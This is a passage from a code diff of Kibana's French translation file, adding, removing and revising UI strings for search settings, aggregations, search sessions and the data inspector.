Ne s'applique actuellement que lorsque les fonctionnalités de requête expérimentales sont activées dans la barre de requête. Pour ne plus autoriser l’utilisation de caractères génériques au début des requêtes Lucene de base, utilisez {queryStringOptionsPattern}.",
+ "data.advancedSettings.query.queryStringOptionsText": "{optionsLink} pour l'analyseur de chaînes de requête Lucene. Uniquement utilisé lorsque \"{queryLanguage}\" est défini sur {luceneLanguage}.",
+ "data.advancedSettings.sortOptionsText": "{optionsLink} pour le paramètre de tri Elasticsearch",
+ "data.advancedSettings.timepicker.quickRangesText": "La liste des plages à afficher dans la section rapide du filtre temporel. Il s’agit d’un tableau d'objets, avec chaque objet contenant \"de\", \"à\" (voir {acceptedFormatsLink}) et \"afficher\" (le titre à afficher).",
+ "data.aggTypes.buckets.ranges.rangesFormatMessage": "{gte} {from} et {lt} {to}",
+ "data.aggTypes.buckets.ranges.rangesFormatMessageArrowRight": "{from} → {to}",
+ "data.filter.filterBar.fieldNotFound": "Champ {key} non trouvé dans la vue de données {dataView}",
+ "data.inspector.table.tableLabel": "Tableau {index}",
+ "data.inspector.table.tablesDescription": "Il y a {tablesCount, plural, one {# tableau} other {# tableaux} } au total.",
+ "data.mgmt.searchSessions.api.fetchTimeout": "La récupération des informations de la session de recherche a expiré après {timeout} secondes",
+ "data.mgmt.searchSessions.extendModal.extendMessage": "L'expiration de la session de recherche \"{name}\" sera étendue jusqu'à {newExpires}.",
+ "data.mgmt.searchSessions.status.expiresOn": "Expire le {expireDate}",
+ "data.mgmt.searchSessions.status.expiresSoonInDays": "Expire dans {numDays} jours",
+ "data.mgmt.searchSessions.status.expiresSoonInDaysTooltip": "{numDays} jours",
+ "data.mgmt.searchSessions.status.expiresSoonInHours": "Cette session expire dans {numHours} heures",
+ "data.mgmt.searchSessions.status.expiresSoonInHoursTooltip": "{numHours} heures",
+ 
"data.mgmt.searchSessions.status.message.createdOn": "Expire le {expireDate}",
+ "data.mgmt.searchSessions.status.message.error": "Erreur : {error}",
+ "data.mgmt.searchSessions.status.message.expiredOn": "Expiré le {expireDate}",
+ "data.painlessError.painlessScriptedFieldErrorMessage": "Erreur d'exécution du champ d'exécution ou du champ scripté sur le modèle d'indexation {indexPatternName}",
+ "data.parseEsInterval.invalidEsCalendarIntervalErrorMessage": "Intervalle de calendrier non valide : {interval} ; la valeur doit être 1.",
+ "data.parseEsInterval.invalidEsIntervalFormatErrorMessage": "Format d'intervalle non valide : {interval}",
+ "data.search.aggs.aggTypesLabel": "plages {fieldName}",
+ "data.search.aggs.buckets.dateHistogramLabel": "{fieldName} par {intervalDescription}",
+ "data.search.aggs.buckets.ipRangeLabel": "Plages d'IP de {fieldName}",
+ "data.search.aggs.buckets.significantTermsLabel": "Top {size} des termes les plus inhabituels pour {fieldName}",
+ "data.search.aggs.buckets.significantTextLabel": "Top {size} des termes les plus inhabituels pour \"{fieldName}\"",
+ "data.search.aggs.error.aggNotFound": "Aucun type d'agrégation enregistré pour \"{type}\".",
+ "data.search.aggs.metrics.averageLabel": "Moyenne {field}",
+ "data.search.aggs.metrics.maxLabel": "Max. {field}",
+ "data.search.aggs.metrics.medianLabel": "Médiane {field}",
+ "data.search.aggs.metrics.minLabel": "Min. 
{field}",
+ "data.search.aggs.metrics.percentileRanks.valuePropsLabel": "Rang centile {format} de \"{label}\"",
+ "data.search.aggs.metrics.percentileRanksLabel": "Rangs centiles de {field}",
+ "data.search.aggs.metrics.percentiles.valuePropsLabel": "{percentile} centile de {label}",
+ "data.search.aggs.metrics.percentilesLabel": "Centiles de {field}",
+ "data.search.aggs.metrics.singlePercentileLabel": "Centile {field}",
+ "data.search.aggs.metrics.singlePercentileRankLabel": "Rang centile de {field}",
+ "data.search.aggs.metrics.standardDeviation.keyDetailsLabel": "Écart-type de {fieldDisplayName}",
+ "data.search.aggs.metrics.standardDeviation.lowerKeyDetailsTitle": "{label} inférieur",
+ "data.search.aggs.metrics.standardDeviation.upperKeyDetailsTitle": "{label} supérieur",
+ "data.search.aggs.metrics.standardDeviationLabel": "Écart-type de {field}",
+ "data.search.aggs.metrics.sumLabel": "Somme de {field}",
+ "data.search.aggs.metrics.topMetrics.ascNoSizeLabel": "Première valeur \"{fieldName}\" par \"{sortField}\"",
+ "data.search.aggs.metrics.topMetrics.ascWithSizeLabel": "{size} premières valeurs \"{fieldName}\" par \"{sortField}\"",
+ "data.search.aggs.metrics.topMetrics.descNoSizeLabel": "Dernière valeur \"{fieldName}\" par \"{sortField}\"",
+ "data.search.aggs.metrics.topMetrics.descWithSizeLabel": "{size} dernières valeurs \"{fieldName}\" par \"{sortField}\"",
+ "data.search.aggs.metrics.uniqueCountLabel": "Décompte unique de {field}",
+ "data.search.aggs.metrics.valueCountLabel": "Décompte de la valeur de {field}",
+ "data.search.aggs.paramTypes.field.invalidSavedFieldParameterErrorMessage": "Le champ enregistré \"{fieldParameter}\" de la vue de données \"{indexPatternTitle}\" n'est pas valide pour une utilisation avec l'agrégation \"{aggType}\". Veuillez sélectionner un nouveau champ.",
+ "data.search.aggs.paramTypes.field.notFoundSavedFieldParameterErrorMessage": "Le champ \"{fieldParameter}\" associé à cet objet n'existe plus dans la vue de données. 
Veuillez utiliser un autre champ.",
+ "data.search.aggs.paramTypes.field.requiredFieldParameterErrorMessage": "{fieldParameter} est un paramètre requis.",
+ "data.search.aggs.percentageOfLabel": "Pourcentage de {label}",
+ "data.search.aggs.rareTerms.aggTypesLabel": "Termes rares de {fieldName}",
+ "data.search.es_search.queryTimeValue": "{queryTime} ms",
+ "data.search.functions.geoBoundingBox.arguments.error": "Au moins un des groupes de paramètres suivants doit être fourni : {parameters}.",
+ "data.search.searchSource.fetch.shardsFailedModal.failureHeader": "{failureName} à {failureDetails}",
+ "data.search.searchSource.fetch.shardsFailedModal.tableRowCollapse": "Réduire {rowDescription}",
+ "data.search.searchSource.fetch.shardsFailedModal.tableRowExpand": "Développer {rowDescription}",
+ "data.search.searchSource.fetch.shardsFailedNotificationMessage": "Échec de {shardsFailed} partitions sur {shardsTotal}",
+ "data.search.searchSource.indexPatternIdDescription": "L'ID dans l'index {kibanaIndexPattern}.",
+ "data.search.searchSource.queryTimeValue": "{queryTime} ms",
+ "data.search.searchSource.requestTimeValue": "{requestTime} ms",
+ "data.search.statusError": "Recherche terminée avec un statut {errorCode}",
+ "data.search.statusThrow": "Le statut de la recherche a généré un statut d'erreur {message} ({errorCode})",
+ "data.search.timeBuckets.dayLabel": "{amount, plural, one {un jour} other {# jours}}",
+ "data.search.timeBuckets.hourLabel": "{amount, plural, one {une heure} other {# heures}}",
+ "data.search.timeBuckets.millisecondLabel": "{amount, plural, one {une milliseconde} other {# millisecondes}}",
+ "data.search.timeBuckets.minuteLabel": "{amount, plural, one {une minute} other {# minutes}}",
+ "data.search.timeBuckets.secondLabel": "{amount, plural, one {une seconde} other {# secondes}}",
+ "data.searchSessionIndicator.canceledWhenText": "Arrêtée {when}",
+ "data.searchSessionIndicator.loadingInTheBackgroundWhenText": "Débuté {when}",
+ 
"data.searchSessionIndicator.loadingResultsWhenText": "Débuté {when}",
+ "data.searchSessionIndicator.restoredWhenText": "Terminé {when}",
+ "data.searchSessionIndicator.resultLoadedInTheBackgroundWhenText": "Terminé {when}",
+ "data.searchSessionIndicator.resultsLoadedWhenText": "Terminé {when}",
+ "data.advancedSettings.autocompleteIgnoreTimerange": "Utiliser la plage temporelle",
 "data.advancedSettings.autocompleteValueSuggestionMethod": "Méthode de suggestion de saisie semi-automatique",
 "data.advancedSettings.autocompleteValueSuggestionMethodLearnMoreLink": "En savoir plus.",
 "data.advancedSettings.autocompleteValueSuggestionMethodLink": "En savoir plus.",
- "data.advancedSettings.autocompleteValueSuggestionMethodText": "La méthode utilisée pour générer des suggestions de valeur pour la saisie semi-automatique KQL. Sélectionnez terms_enum pour utiliser l'API d'énumération de termes d'Elasticsearch afin d’améliorer les performances de suggestion de saisie semi-automatique. Sélectionnez terms_agg pour utiliser l'agrégation de termes d'Elasticsearch. {learnMoreLink}",
 "data.advancedSettings.courier.customRequestPreference.requestPreferenceLinkText": "Préférence de requête",
- "data.advancedSettings.courier.customRequestPreferenceText": "{requestPreferenceLink} utilisé lorsque {setRequestReferenceSetting} est défini sur {customSettingValue}.",
 "data.advancedSettings.courier.customRequestPreferenceTitle": "Préférence de requête personnalisée",
 "data.advancedSettings.courier.ignoreFilterText": "Cette configuration améliore la prise en charge des tableaux de bord contenant des visualisations accédant à des index différents. Lorsque ce paramètre est désactivé, tous les filtres sont appliqués à toutes les visualisations. 
En cas d'activation, le ou les filtres sont ignorés pour une visualisation lorsque l'index de celle-ci ne contient pas le champ de filtrage.",
 "data.advancedSettings.courier.ignoreFilterTitle": "Ignorer le ou les filtres",
- "data.advancedSettings.courier.maxRequestsText": "Contrôle le paramètre {maxRequestsLink} utilisé pour les requêtes _msearch envoyées par Kibana. Définir ce paramètre sur 0 permet d’utiliser la valeur Elasticsearch par défaut.",
 "data.advancedSettings.courier.maxRequestsTitle": "Requêtes de partitions simultanées max.",
 "data.advancedSettings.courier.requestPreferenceCustom": "Personnalisée",
 "data.advancedSettings.courier.requestPreferenceNone": "Aucune",
 "data.advancedSettings.courier.requestPreferenceSessionId": "ID session",
- "data.advancedSettings.courier.requestPreferenceText": "Permet de définir quelles partitions doivent gérer les requêtes de recherche.\n
    \n
  • {sessionId} : limite les opérations pour exécuter toutes les requêtes de recherche sur les mêmes partitions.\n Cela a l'avantage de réutiliser les caches de partition pour toutes les requêtes.
  • \n
  • {custom} : permet de définir une valeur de préférence.\n Utilisez \"courier:customRequestPreference\" pour personnaliser votre valeur de préférence.
  • \n
  • {none} : permet de ne pas définir de préférence.\n Cela peut permettre de meilleures performances, car les requêtes peuvent être réparties entre toutes les copies de partition.\n Cependant, les résultats peuvent être incohérents, les différentes partitions pouvant se trouver dans différents états d'actualisation.
  • \n
", + "data.advancedSettings.courier.requestPreferenceText": "Permet de définir quelles partitions doivent gérer les requêtes de recherche.\n
    \n
  • {sessionId} : limite les opérations pour exécuter toutes les requêtes de recherche sur les mêmes partitions.\n Cela a l'avantage de réutiliser les caches de partition pour toutes les requêtes.
  • \n
  • {custom} : permet de définir une valeur de préférence.\n Utilisez \"courier:customRequestPreference\" pour personnaliser votre valeur de préférence.
  • \n
  • {none} : permet de ne pas définir de préférence.\n Cela peut permettre de meilleures performances, car les requêtes peuvent être réparties entre toutes les copies de partition.\n Cependant, les résultats peuvent être incohérents, les différentes partitions pouvant se trouver dans différents états d'actualisation.
  • \n
", "data.advancedSettings.courier.requestPreferenceTitle": "Préférence de requête", "data.advancedSettings.defaultIndexText": "L’index utilisé en l’absence de spécification.", "data.advancedSettings.defaultIndexTitle": "Index par défaut", 
@@ -2015,33 +1157,29 @@ "data.advancedSettings.metaFieldsTitle": "Champs méta", "data.advancedSettings.pinFiltersText": "Détermine si les filtres doivent avoir un certain état global (être épinglés) par défaut.", "data.advancedSettings.pinFiltersTitle": "Épingler les filtres par défaut", - "data.advancedSettings.query.allowWildcardsText": "Lorsque ce paramètre est activé, le caractère \"*\" est autorisé en tant que premier caractère dans une clause de requête. Ne s'applique actuellement que lorsque les fonctionnalités de requête expérimentales sont activées dans la barre de requête. Pour ne plus autoriser l’utilisation de caractères génériques au début des requêtes Lucene de base, utilisez {queryStringOptionsPattern}.", "data.advancedSettings.query.allowWildcardsTitle": "Autoriser les caractères génériques au début des requêtes", "data.advancedSettings.query.queryStringOptions.optionsLinkText": "Options", - "data.advancedSettings.query.queryStringOptionsText": "{optionsLink} pour l'analyseur de chaînes de requête Lucene. Uniquement utilisé lorsque \"{queryLanguage}\" est défini sur {luceneLanguage}.", "data.advancedSettings.query.queryStringOptionsTitle": "Options de chaîne de requête", - "data.advancedSettings.search.includeFrozenTextDeprecation": "Ce paramètre est déclassé et sera supprimé dans la version 9.0 de Kibana.", + "data.advancedSettings.search.includeFrozenTextDeprecation": "Ce paramètre est déclassé et sera supprimé dans la version 9.0 de Kibana.", "data.advancedSettings.searchQueryLanguageKql": "KQL", "data.advancedSettings.searchQueryLanguageLucene": "Lucene", "data.advancedSettings.searchQueryLanguageText": "Le langage de requête utilisé par la barre de requête. 
KQL est un nouveau langage spécialement conçu pour Kibana.", "data.advancedSettings.searchQueryLanguageTitle": "Langage de requête", "data.advancedSettings.searchTimeout": "Délai d'expiration de la recherche", - "data.advancedSettings.searchTimeoutDesc": "Permet de définir le délai d'expiration maximal pour une session de recherche. La valeur 0 permet de désactiver le délai d’expiration afin que les requêtes soient exécutées jusqu'au bout.", + "data.advancedSettings.searchTimeoutDesc": "Permet de définir le délai d'expiration maximal pour une session de recherche. La valeur 0 permet de désactiver le délai d’expiration afin que les requêtes soient exécutées jusqu'au bout.", "data.advancedSettings.sortOptions.optionsLinkText": "Options", - "data.advancedSettings.sortOptionsText": "{optionsLink} pour le paramètre de tri Elasticsearch", "data.advancedSettings.sortOptionsTitle": "Options de tri", "data.advancedSettings.suggestFilterValuesText": "Définir cette propriété sur \"faux\" permet d’empêcher l'éditeur de filtres de suggérer des valeurs pour les champs.", "data.advancedSettings.suggestFilterValuesTitle": "Suggestions de l'éditeur de filtres", - "data.advancedSettings.timepicker.last15Minutes": "Dernières 15 minutes", + "data.advancedSettings.timepicker.last15Minutes": "Dernières 15 minutes", "data.advancedSettings.timepicker.last1Hour": "Dernière heure", "data.advancedSettings.timepicker.last1Year": "Dernière année", - "data.advancedSettings.timepicker.last24Hours": "Dernières 24 heures", - "data.advancedSettings.timepicker.last30Days": "30 derniers jours", - "data.advancedSettings.timepicker.last30Minutes": "30 dernières minutes", - "data.advancedSettings.timepicker.last7Days": "7 derniers jours", - "data.advancedSettings.timepicker.last90Days": "90 derniers jours", + "data.advancedSettings.timepicker.last24Hours": "Dernières 24 heures", + "data.advancedSettings.timepicker.last30Days": "30 derniers jours", + "data.advancedSettings.timepicker.last30Minutes": "30 
dernières minutes", + "data.advancedSettings.timepicker.last7Days": "7 derniers jours", + "data.advancedSettings.timepicker.last90Days": "90 derniers jours", "data.advancedSettings.timepicker.quickRanges.acceptedFormatsLinkText": "formats acceptés", - "data.advancedSettings.timepicker.quickRangesText": "La liste des plages à afficher dans la section rapide du filtre temporel. Il s’agit d’un tableau d'objets, avec chaque objet contenant \"de\", \"à\" (voir {acceptedFormatsLink}) et \"afficher\" (le titre à afficher).", "data.advancedSettings.timepicker.quickRangesTitle": "Plages rapides du filtre temporel", "data.advancedSettings.timepicker.refreshIntervalDefaultsText": "L'intervalle d'actualisation par défaut du filtre temporel. La valeur doit être spécifiée en millisecondes.", "data.advancedSettings.timepicker.refreshIntervalDefaultsTitle": "Intervalle d'actualisation du filtre temporel", @@ -2049,11 +1187,8 @@ "data.advancedSettings.timepicker.timeDefaultsText": "L’option de filtre temporel à utiliser lorsque Kibana est démarré sans filtre", "data.advancedSettings.timepicker.timeDefaultsTitle": "Filtre temporel par défaut", "data.advancedSettings.timepicker.today": "Aujourd'hui", - "data.aggTypes.buckets.ranges.rangesFormatMessage": "{gte} {from} et {lt} {to}", - "data.aggTypes.buckets.ranges.rangesFormatMessageArrowRight": "{from} → {to}", "data.errors.fetchError": "Vérifiez votre réseau et la configuration de votre proxy. Si le problème persiste, contactez votre administrateur réseau.", "data.esError.unknownRootCause": "inconnue", - "data.filter.filterBar.fieldNotFound": "Champ {key} non trouvé dans la vue de données {dataView}", "data.functions.esaggs.help": "Exécuter l'agrégation AggConfig", "data.functions.esaggs.inspector.dataRequest.description": "Cette requête interroge Elasticsearch pour récupérer les données pour la visualisation.", "data.functions.esaggs.inspector.dataRequest.title": "Données", 
@@ -2061,7 +1196,7 @@
 "data.inspector.table.dataTitle": "Données",
 "data.inspector.table.downloadCSVToggleButtonLabel": "Télécharger CSV",
 "data.inspector.table.downloadOptionsUnsavedFilename": "non enregistré",
- "data.inspector.table.exportButtonFormulasWarning": "Votre fichier CSV contient des caractères que les applications de feuilles de calcul pourraient considérer comme des formules.",
+ "data.inspector.table.exportButtonFormulasWarning": "Votre fichier CSV contient des caractères que les applications de feuilles de calcul pourraient considérer comme des formules.",
 "data.inspector.table.filterForValueButtonAriaLabel": "Filtrer sur la valeur",
 "data.inspector.table.filterForValueButtonTooltip": "Filtrer sur la valeur",
 "data.inspector.table.filterOutValueButtonAriaLabel": "Exclure la valeur",
@@ -2072,19 +1207,16 @@
 "data.inspector.table.noDataAvailableTitle": "Aucune donnée disponible",
 "data.inspector.table.rawCSVButtonLabel": "CSV brut",
 "data.inspector.table.rawCSVButtonTooltip": "Télécharger les données telles que fournies, par exemple, les dates sous forme d'horodatages",
- "data.inspector.table.tableLabel": "Tableau {index}",
- "data.inspector.table.tablesDescription": "Il y a {tablesCount, plural, one {# tableau} other {# tableaux} } au total.",
- "data.inspector.table.tableSelectorLabel": "Sélectionné :",
+ "data.inspector.table.tableSelectorLabel": "Sélectionné :",
 "data.mgmt.searchSessions.actionDelete": "Supprimer",
 "data.mgmt.searchSessions.actionExtend": "Étendre",
 "data.mgmt.searchSessions.actionRename": "Modifier le nom",
 "data.mgmt.searchSessions.actions.tooltip.moreActions": "Plus d'actions",
 "data.mgmt.searchSessions.api.deleted": "La session de recherche a été supprimée.",
- "data.mgmt.searchSessions.api.deletedError": "Impossible de supprimer la session de recherche !",
+ "data.mgmt.searchSessions.api.deletedError": "Impossible de supprimer la session de recherche !",
 "data.mgmt.searchSessions.api.extended": "La session de recherche a été étendue.",
- "data.mgmt.searchSessions.api.extendError": "Impossible d'étendre la session de recherche !",
- "data.mgmt.searchSessions.api.fetchError": "Impossible d'actualiser la page !",
- "data.mgmt.searchSessions.api.fetchTimeout": "La récupération des informations de la session de recherche a expiré après {timeout} secondes",
+ "data.mgmt.searchSessions.api.extendError": "Impossible d'étendre la session de recherche !",
+ "data.mgmt.searchSessions.api.fetchError": "Impossible d'actualiser la page !",
 "data.mgmt.searchSessions.api.rename": "La session de recherche a été renommée",
 "data.mgmt.searchSessions.api.renameError": "Impossible de renommer la session de recherche",
 "data.mgmt.searchSessions.appTitle": "Sessions de recherche",
@@ -2095,7 +1227,6 @@
 "data.mgmt.searchSessions.cancelModal.title": "Supprimer la session de recherche",
 "data.mgmt.searchSessions.extendModal.dontExtendButton": "Annuler",
 "data.mgmt.searchSessions.extendModal.extendButton": "Étendre l'expiration",
- "data.mgmt.searchSessions.extendModal.extendMessage": "L'expiration de la session de recherche \"{name}\" sera étendue jusqu'à {newExpires}.",
 "data.mgmt.searchSessions.extendModal.title": "Étendre l'expiration de la session de recherche",
 "data.mgmt.searchSessions.flyoutTitle": "Inspecter",
 "data.mgmt.searchSessions.main.backgroundSessionsDocsLinkText": "Documentation",
@@ -2108,21 +1239,13 @@
 "data.mgmt.searchSessions.search.filterApp": "Application",
 "data.mgmt.searchSessions.search.filterStatus": "Statut",
 "data.mgmt.searchSessions.search.tools.refresh": "Actualiser",
- "data.mgmt.searchSessions.status.expireDateUnknown": "inconnu",
- "data.mgmt.searchSessions.status.expiresOn": "Expire le {expireDate}",
- "data.mgmt.searchSessions.status.expiresSoonInDays": "Expire dans {numDays} jours",
- "data.mgmt.searchSessions.status.expiresSoonInDaysTooltip": "{numDays} jours",
- "data.mgmt.searchSessions.status.expiresSoonInHours": "Cette session expire dans {numHours} heures",
- "data.mgmt.searchSessions.status.expiresSoonInHoursTooltip": "{numHours} heures",
+ "data.mgmt.searchSessions.status.expireDateUnknown": "inconnue",
 "data.mgmt.searchSessions.status.label.cancelled": "Annulé",
 "data.mgmt.searchSessions.status.label.complete": "Terminé",
 "data.mgmt.searchSessions.status.label.error": "Erreur",
 "data.mgmt.searchSessions.status.label.expired": "Expiré",
 "data.mgmt.searchSessions.status.label.inProgress": "En cours",
 "data.mgmt.searchSessions.status.message.cancelled": "Annulé par l'utilisateur",
- "data.mgmt.searchSessions.status.message.createdOn": "Expire le {expireDate}",
- "data.mgmt.searchSessions.status.message.error": "Erreur : {error}",
- "data.mgmt.searchSessions.status.message.expiredOn": "Expiré le {expireDate}",
 "data.mgmt.searchSessions.table.headerExpiration": "Expiration",
 "data.mgmt.searchSessions.table.headerName": "Nom",
 "data.mgmt.searchSessions.table.headerStarted": "Créé",
@@ -2133,13 +1256,9 @@
 "data.mgmt.searchSessions.table.numSearches": "# recherches",
 "data.mgmt.searchSessions.table.versionIncompatibleWarning": "Cette session de recherche a été créée dans une instance Kibana exécutant une version différente. Il se peut qu'elle ne soit pas correctement restaurée.",
 "data.painlessError.buttonTxt": "Modifier le script",
- "data.painlessError.painlessScriptedFieldErrorMessage": "Erreur d'exécution du champ d'exécution ou du champ scripté sur le modèle d'indexation {indexPatternName}",
- "data.parseEsInterval.invalidEsCalendarIntervalErrorMessage": "Intervalle de calendrier non valide : {interval} ; la valeur doit être 1.",
- "data.parseEsInterval.invalidEsIntervalFormatErrorMessage": "Format d'intervalle non valide : {interval}",
 "data.search.aggs.aggGroups.bucketsText": "Compartiments",
 "data.search.aggs.aggGroups.metricsText": "Indicateurs",
- "data.search.aggs.aggGroups.noneText": "Aucune",
- "data.search.aggs.aggTypesLabel": "plages {fieldName}",
+ "data.search.aggs.aggGroups.noneText": "Aucun",
 "data.search.aggs.buckets.dateHistogram.customLabel.help": "Représente une étiquette personnalisée pour cette agrégation",
 "data.search.aggs.buckets.dateHistogram.dropPartials.help": "Spécifie l'utilisation ou non de drop_partials pour cette agrégation.",
 "data.search.aggs.buckets.dateHistogram.enabled.help": "Spécifie si cette agrégation doit être activée.",
@@ -2156,7 +1275,6 @@
 "data.search.aggs.buckets.dateHistogram.timeRange.help": "Plage temporelle à utiliser pour cette agrégation",
 "data.search.aggs.buckets.dateHistogram.timeZone.help": "Fuseau horaire à utiliser pour cette agrégation",
 "data.search.aggs.buckets.dateHistogram.useNormalizedEsInterval.help": "Spécifie l'utilisation ou non de useNormalizedEsInterval pour cette agrégation.",
- "data.search.aggs.buckets.dateHistogramLabel": "{fieldName} par {intervalDescription}",
 "data.search.aggs.buckets.dateHistogramTitle": "Histogramme de date",
 "data.search.aggs.buckets.dateRange.customLabel.help": "Représente une étiquette personnalisée pour cette agrégation",
 "data.search.aggs.buckets.dateRange.enabled.help": "Spécifie si cette agrégation doit être activée.",
@@ -2176,7 +1294,7 @@
 "data.search.aggs.buckets.diversifiedSamplerTitle": "Échantillonneur diversifié",
 "data.search.aggs.buckets.filter.customLabel.help": "Représente une étiquette personnalisée pour cette agrégation",
 "data.search.aggs.buckets.filter.enabled.help": "Spécifie si cette agrégation doit être activée.",
- "data.search.aggs.buckets.filter.filter.help": "Pour filtrer les résultats en fonction d’une requête KQL ou Lucene. Ne pas utiliser en association avec geo_bounding_box.",
+ "data.search.aggs.buckets.filter.filter.help": "Pour filtrer les résultats en fonction d’une requête KQL ou Lucene. Ne pas utiliser en association avec geo_bounding_box.",
 "data.search.aggs.buckets.filter.geoBoundingBox.help": "Pour filtrer les résultats en fonction d’une localisation au sein d’une zone de délimitation",
 "data.search.aggs.buckets.filter.id.help": "ID pour cette agrégation",
 "data.search.aggs.buckets.filter.json.help": "Json avancé à inclure lorsque l'agrégation est envoyée vers Elasticsearch",
@@ -2236,18 +1354,17 @@ "data.search.aggs.buckets.ipRange.enabled.help": "Spécifie si cette agrégation doit être activée.", "data.search.aggs.buckets.ipRange.field.help": "Champ à utiliser pour cette agrégation", "data.search.aggs.buckets.ipRange.id.help": "ID pour cette agrégation", - "data.search.aggs.buckets.ipRange.ipRangeType.help": "Type de plage d'IP à utiliser pour cette agrégation. Doit être l’une des valeurs suivantes : mask, fromTo.", + "data.search.aggs.buckets.ipRange.ipRangeType.help": "Type de plage d'IP à utiliser pour cette agrégation. Doit être l’une des valeurs suivantes : mask, fromTo.", "data.search.aggs.buckets.ipRange.json.help": "Json avancé à inclure lorsque l'agrégation est envoyée vers Elasticsearch", "data.search.aggs.buckets.ipRange.ranges.help": "Plages à utiliser pour cette agrégation.", "data.search.aggs.buckets.ipRange.schema.help": "Schéma à utiliser pour cette agrégation", - "data.search.aggs.buckets.ipRangeLabel": "Plages d'IP de {fieldName}", "data.search.aggs.buckets.ipRangeTitle": "Plage d'IP", "data.search.aggs.buckets.multiTerms.customLabel.help": "Représente une étiquette personnalisée pour cette agrégation", "data.search.aggs.buckets.multiTerms.enabled.help": "Spécifie si cette agrégation doit être activée.", "data.search.aggs.buckets.multiTerms.fields.help": "Champs à utiliser pour cette agrégation", "data.search.aggs.buckets.multiTerms.id.help": "ID pour cette agrégation", "data.search.aggs.buckets.multiTerms.json.help": "Json avancé à inclure lorsque l'agrégation est envoyée vers Elasticsearch", - "data.search.aggs.buckets.multiTerms.order.help": "Ordre dans lequel renvoyer les résultats : croissant ou décroissant", + "data.search.aggs.buckets.multiTerms.order.help": "Ordre dans lequel renvoyer les résultats : croissant ou décroissant", "data.search.aggs.buckets.multiTerms.orderAgg.help": "Configuration d'agrégation à utiliser pour ordonner les résultats", "data.search.aggs.buckets.multiTerms.orderBy.help": "Champ selon 
lequel ordonner les résultats", "data.search.aggs.buckets.multiTerms.otherBucket.help": "Lorsqu'il est défini sur ''vrai'', ce paramètre regroupe tous les compartiments au-delà de la taille autorisée.", @@ -2277,7 +1394,7 @@ "data.search.aggs.buckets.sampler.shardSize.help": "Le paramètre shard_size limite le nombre de documents les mieux classés recueillis dans l'échantillon traité sur chaque partition.", "data.search.aggs.buckets.samplerTitle": "Échantillonneur", "data.search.aggs.buckets.shardDelay.customLabel.help": "Représente une étiquette personnalisée pour cette agrégation", - "data.search.aggs.buckets.shardDelay.delay.help": "Délai entre les partitions à traiter. Exemple : \"5s\".", + "data.search.aggs.buckets.shardDelay.delay.help": "Délai entre les partitions à traiter. Exemple : \"5s\".", "data.search.aggs.buckets.shardDelay.enabled.help": "Spécifie si cette agrégation doit être activée.", "data.search.aggs.buckets.shardDelay.id.help": "ID pour cette agrégation", "data.search.aggs.buckets.shardDelay.json.help": "Json avancé à inclure lorsque l'agrégation est envoyée vers Elasticsearch", @@ -2293,7 +1410,6 @@ "data.search.aggs.buckets.significantTerms.json.help": "Json avancé à inclure lorsque l'agrégation est envoyée vers Elasticsearch", "data.search.aggs.buckets.significantTerms.schema.help": "Schéma à utiliser pour cette agrégation", "data.search.aggs.buckets.significantTerms.size.help": "Nombre maximal de compartiments à extraire", - "data.search.aggs.buckets.significantTermsLabel": "Top {size} des termes les plus inhabituels pour {fieldName}", "data.search.aggs.buckets.significantTermsTitle": "Termes importants", "data.search.aggs.buckets.significantText.customLabel.help": "Représente une étiquette personnalisée pour cette agrégation", "data.search.aggs.buckets.significantText.enabled.help": "Spécifie si cette agrégation doit être activée.", 
@@ -2308,21 +1424,22 @@ "data.search.aggs.buckets.significantText.minDocCount.help": "Renvoyer des termes dont la correspondance est supérieure à un nombre configuré", "data.search.aggs.buckets.significantText.schema.help": "Schéma à utiliser pour cette agrégation", "data.search.aggs.buckets.significantText.size.help": "Nombre maximal de compartiments à extraire", - "data.search.aggs.buckets.significantTextLabel": "Top {size} des termes les plus inhabituels pour \"{fieldName}\"", "data.search.aggs.buckets.significantTextTitle": "Texte important", "data.search.aggs.buckets.terms.customLabel.help": "Représente une étiquette personnalisée pour cette agrégation", "data.search.aggs.buckets.terms.enabled.help": "Spécifie si cette agrégation doit être activée.", "data.search.aggs.buckets.terms.exclude.help": "Valeurs de compartiment spécifiques à exclure des résultats", + "data.search.aggs.buckets.terms.excludeIsRegex.help": "Lorsque l’option est définie sur vrai, la propriété d'exclusion est traitée comme une expression régulière.", "data.search.aggs.buckets.terms.excludeLabel": "Exclure", "data.search.aggs.buckets.terms.field.help": "Champ à utiliser pour cette agrégation", "data.search.aggs.buckets.terms.id.help": "ID pour cette agrégation", "data.search.aggs.buckets.terms.include.help": "Valeurs de compartiment spécifiques à inclure dans les résultats", + "data.search.aggs.buckets.terms.includeIsRegex.help": "Lorsque l’option est définie sur vrai, la propriété d’inclusion est traitée comme une expression régulière.", "data.search.aggs.buckets.terms.includeLabel": "Inclure", "data.search.aggs.buckets.terms.json.help": "Json avancé à inclure lorsque l'agrégation est envoyée vers Elasticsearch", "data.search.aggs.buckets.terms.missingBucket.help": "Lorsqu'il est défini sur ''vrai'', ce paramètre regroupe tous les compartiments avec des champs manquants.", "data.search.aggs.buckets.terms.missingBucketLabel": "Manquant", 
"data.search.aggs.buckets.terms.missingBucketLabel.help": "Étiquette par défaut utilisée dans les graphiques lorsqu'il manque un champ aux documents.", - "data.search.aggs.buckets.terms.order.help": "Ordre dans lequel renvoyer les résultats : croissant ou décroissant", + "data.search.aggs.buckets.terms.order.help": "Ordre dans lequel renvoyer les résultats : croissant ou décroissant", "data.search.aggs.buckets.terms.orderAgg.help": "Configuration d'agrégation à utiliser pour ordonner les résultats", "data.search.aggs.buckets.terms.orderAscendingTitle": "Croissant", "data.search.aggs.buckets.terms.orderBy.help": "Champ selon lequel ordonner les résultats", @@ -2336,7 +1453,6 @@ "data.search.aggs.buckets.terms.shardSize.help": "Nombre de termes à évaluer lors de l'agrégation.", "data.search.aggs.buckets.terms.size.help": "Nombre maximal de compartiments à extraire", "data.search.aggs.buckets.termsTitle": "Termes", - "data.search.aggs.error.aggNotFound": "Aucun type d'agrégation enregistré pour \"{type}\".", "data.search.aggs.function.buckets.dateHistogram.help": "Génère une configuration d'agrégation en série pour une agrégation Histogramme.", "data.search.aggs.function.buckets.dateRange.help": "Génère une configuration d'agrégation en série pour une agrégation Plage de dates.", "data.search.aggs.function.buckets.diversifiedSampler.help": "Génère une configuration d'agrégation en série pour une agrégation Échantillonneur diversifié.", 
@@ -2374,13 +1490,14 @@
 "data.search.aggs.function.metrics.percentiles.help": "Génère une configuration d'agrégation en série pour une agrégation Centiles.",
 "data.search.aggs.function.metrics.serial_diff.help": "Génère une configuration d'agrégation en série pour une agrégation Différenciation en série.",
